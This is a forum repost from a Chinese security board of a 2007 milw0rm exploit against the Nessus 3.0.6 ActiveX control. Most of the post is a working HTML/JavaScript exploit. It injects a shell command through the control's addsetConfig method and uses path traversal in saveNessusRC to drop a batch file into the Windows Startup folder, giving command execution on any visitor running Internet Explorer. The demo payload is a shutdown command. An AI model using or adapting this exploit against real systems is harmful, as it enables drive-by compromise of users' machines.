邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit [查看完整版本]

pub!1c 2007-8-12 12:47

Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit

[code]<HTML>
<!--
Nessus Vulnerability Scanner 3.0.6 ActiveX 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <[email]h07@interia.pl[/email]>
Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish
Just for fun ;]
-->

<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>

<script language="javascript">
obj.addsetConfig(&#39;shutdown -t 1000 -s -c "hello world ;]" && pause&#39;, &#39;&#39;, &#39;&#39;);
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
</script>
</HTML>

# milw0rm.com [2007-07-27]
[/code]

查看完整版本: Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit

© 1999-2008 EvilOctal Security Team